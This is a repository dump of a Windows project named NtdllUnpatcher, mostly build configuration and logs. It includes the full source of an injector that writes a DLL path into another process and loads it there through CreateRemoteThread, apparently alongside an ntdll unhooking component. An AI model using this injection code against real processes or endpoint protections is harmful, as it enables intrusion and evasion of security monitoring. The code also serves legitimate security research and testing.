| 90 | Use 91 | Level3 92 | Disabled 93 | true 94 | WIN32;_DEBUG;NTDLLUNPATCHER_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 95 | true 96 | 97 | 98 | Windows 99 | true 100 | 101 | 102 | 103 | 104 | NotUsing 105 | Level3 106 | Disabled 107 | true 108 | _DEBUG;NTDLLUNPATCHER_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 109 | false 110 | stdcpp14 111 | C:\Users\devl\source\repos\pe-parse-master\pe-parser-library\include\parser-library;%(AdditionalIncludeDirectories) 112 | MultiThreadedDLL 113 | 114 | 115 | Windows 116 | true 117 | true 118 | C:\Users\devl\source\repos\pe-parse-master\pe-parser-library\Release\pe-parser-library.lib;%(AdditionalDependencies) 119 | 120 | 121 | 122 | 123 | Use 124 | Level3 125 | MaxSpeed 126 | true 127 | true 128 | true 129 | WIN32;NDEBUG;NTDLLUNPATCHER_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 130 | true 131 | 132 | 133 | Windows 134 | true 135 | true 136 | true 137 | 138 | 139 | 140 | 141 | NotUsing 142 | Level3 143 | MaxSpeed 144 | true 145 | true 146 | true 147 | NDEBUG;NTDLLUNPATCHER_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 148 | false 149 | ..\Detours-master\include;%(AdditionalIncludeDirectories) 150 | MultiThreadedDLL 151 | stdcpp14 152 | 153 | 154 | Windows 155 | true 156 | true 157 | true 158 | true 159 | Advapi32.lib;..\Detours-master\lib.X64\detours.lib;%(AdditionalDependencies) 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | -------------------------------------------------------------------------------- /NtdllUnpatcher/NtdllUnpatcher.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /NtdllUnpatcher/NtdllUnpatcher.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /NtdllUnpatcher/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.pch 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\vc141.pdb 3 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\vc141.idb 4 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\stdafx.obj 5 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.obj 6 | c:\users\devl\source\repos\ntdllunpatcher\x64\debug\ntdllunpatcher.pdb 7 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\cl.command.1.tlog 8 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\cl.read.1.tlog 9 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\cl.write.1.tlog 10 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-cvtres.read.1.tlog 11 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-cvtres.write.1.tlog 12 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-mt.read.1.tlog 13 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-mt.write.1.tlog 14 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-rc.read.1.tlog 15 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-rc.write.1.tlog 16 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link.command.1.tlog 17 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link.read.1.tlog 18 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link.write.1.tlog 19 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.log: -------------------------------------------------------------------------------- 1 |  NtdllUnpatcher.cpp 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(3): fatal error C1083: Cannot open include file: 'detours.h': No such file or directory 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.pch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.pch -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/NtdllUnpatcher.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.10240.0 2 | Debug|x64|C:\Users\devl\source\repos\NtdllUnpatcher\| 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-cvtres.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-cvtres.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-cvtres.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-cvtres.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-mt.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-mt.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-mt.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-mt.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-rc.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-rc.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-rc.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-rc.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/unsuccessfulbuild: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/unsuccessfulbuild -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/stdafx.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/stdafx.obj -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/vc141.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/vc141.idb -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/vc141.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/vc141.pdb -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\vc141.pdb 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.obj 3 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.dll 4 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.pdb 5 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.lib 6 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.exp 7 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.ipdb 8 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.iobj 9 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\cl.command.1.tlog 10 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\cl.read.1.tlog 11 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\cl.write.1.tlog 12 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\link.command.1.tlog 13 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\link.read.1.tlog 14 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\link.write.1.tlog 15 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\ntdllunpatcher.write.1u.tlog 16 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.log: -------------------------------------------------------------------------------- 1 |  NtdllUnpatcher.cpp 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(218): warning C4129: 'c': unrecognized character escape sequence 3 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(218): warning C4129: 'w': unrecognized character escape sequence 4 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(218): warning C4129: 's': unrecognized character escape sequence 5 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(246): warning C4244: 'argument': conversion from 'LONGLONG' to 'DWORD', possible loss of data 6 | Creating library C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.lib and object C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.exp 7 | Generating code 8 | Finished generating code 9 | All 10 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 10 | NtdllUnpatcher.vcxproj -> C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.dll 11 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.obj -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/NtdllUnpatcher.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.10240.0 2 | Release|x64|C:\Users\devl\source\repos\NtdllUnpatcher\| 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/NtdllUnpatcher.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/NtdllUnpatcher.write.1u.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/vc141.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/vc141.pdb -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/NtdllUnpatcher_Injector.cpp: -------------------------------------------------------------------------------- 1 | // NtdllUnpatcher_Injector.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "NtdllUnpatcher.h" 9 | #include 10 | 11 | BOOL Dll_Injection(TCHAR *dll_name, int processId) 12 | { 13 | TCHAR lpdllpath[MAX_PATH]; 14 | GetFullPathName(dll_name, MAX_PATH, lpdllpath, nullptr); 15 | /* this portion get it and puts it in the memory of the remote process */ 16 | // get size of the dll's path 17 | auto size = wcslen(lpdllpath) * sizeof(TCHAR); 18 | 19 | // open selected process 20 | auto hVictimProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, 0, processId); 21 | if (hVictimProcess == NULL) // check if process open failed 22 | { 23 | return FALSE; 24 | } 25 | // allocate memory in the remote process 26 | auto pNameInVictimProcess = VirtualAllocEx(hVictimProcess, 27 | nullptr, 28 | size, 29 | MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 30 | if (pNameInVictimProcess == NULL) //Check if allocation failed 31 | { 32 | return FALSE; 33 | } 34 | // write the DLL to memory 35 | auto bStatus = WriteProcessMemory(hVictimProcess, 36 | pNameInVictimProcess, 37 | lpdllpath, 38 | size, 39 | nullptr); 40 | if (bStatus == 0) 41 | { 42 | return FALSE; 43 | } 44 | // gets a handle for kernel32dll's LoadLibrary call 45 | auto hKernel32 = GetModuleHandle(L"kernel32.dll"); 46 | if (hKernel32 == NULL) 47 | { 48 | return FALSE; 49 | } 50 | auto LoadLibraryAddress = GetProcAddress(hKernel32, "LoadLibraryW"); 51 | if (LoadLibraryAddress == NULL) 52 | { 53 | if ((LoadLibraryAddress = GetProcAddress(hKernel32, "LoadLibraryA")) == NULL) 54 | { 55 | return FALSE; 56 | } 57 | } 58 | 59 | // Using the above objects execute the DLL in the remote process 60 | auto hThreadId = CreateRemoteThread(hVictimProcess, 61 | NULL, 62 | 0, 63 | (LPTHREAD_START_ROUTINE)LoadLibraryAddress, 64 | pNameInVictimProcess, 65 | NULL, 66 | NULL); 67 | if (hThreadId == NULL) 68 | { 69 | return FALSE; 70 | } 71 | WaitForSingleObject(hThreadId, INFINITE); 72 | 73 | CloseHandle(hVictimProcess); 74 | VirtualFreeEx(hVictimProcess, pNameInVictimProcess, size, MEM_RELEASE); 75 | return TRUE; 76 | } 77 | 78 | int main(int argc, char* argv[]) 79 | { 80 | USES_CONVERSION; 81 | if (argc < 2) 82 | { 83 | printf_s("Usage: ./InjectProc.exe \nExample:\n\ 84 | ./InjectProc.exe path/to/dll.dll 655\n\ 85 | "); 86 | return EXIT_FAILURE; 87 | } 88 | __declspec(dllimport) BOOL InitializeHooks(); 89 | BOOL res = InitializeHooks(); 90 | if (!res) 91 | { 92 | return EXIT_FAILURE; 93 | } 94 | Dll_Injection(A2T(argv[1]), atoi(argv[2])); 95 | return EXIT_SUCCESS; 96 | } -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/NtdllUnpatcher_Injector.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D} 24 | Win32Proj 25 | NtdllUnpatcherInjector 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | Static 55 | false 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | false 77 | 78 | 79 | true 80 | 81 | 82 | true 83 | 84 | 85 | false 86 | 87 | 88 | 89 | NotUsing 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 96 | false 97 | pch.h 98 | ..\NtdllUnpatcher;%(AdditionalIncludeDirectories) 99 | 100 | 101 | Console 102 | true 103 | true 104 | true 105 | Advapi32.lib;..\x64\Release\NtdllUnpatcher.lib;..\Detours-master\lib.X64\detours.lib;%(AdditionalDependencies) 106 | true 107 | 108 | 109 | 110 | 111 | Use 112 | Level3 113 | Disabled 114 | true 115 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 116 | true 117 | pch.h 118 | 119 | 120 | Console 121 | true 122 | 123 | 124 | 125 | 126 | NotUsing 127 | Level3 128 | Disabled 129 | true 130 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 131 | true 132 | pch.h 133 | 134 | 135 | Console 136 | true 137 | 138 | 139 | 140 | 141 | Use 142 | Level3 143 | MaxSpeed 144 | true 145 | true 146 | true 147 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 148 | true 149 | pch.h 150 | 151 | 152 | Console 153 | true 154 | true 155 | true 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/NtdllUnpatcher_Injector.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/NtdllUnpatcher_Injector.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.dll 3648 5 | WindowsLocalDebugger 6 | 7 | 8 | C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.dll 980 9 | WindowsLocalDebugger 10 | 11 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/NtdllUnpatcher_Injector.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 2 | Debug|x64|C:\Users\devl\source\repos\NtdllUnpatcher\| 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnpatcher_Injector.log: -------------------------------------------------------------------------------- 1 |  NtdllUnpatcher_Injector.cpp 2 | NtdllUnpatcher_Injector.vcxproj -> C:\Users\devl\source\repos\NtdllUnpatcher\x64\Debug\NtdllUnpatcher_Injector.exe 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnpatcher_Injector.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnpatcher_Injector.obj -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/vc141.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/vc141.idb -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/vc141.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/vc141.pdb -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- 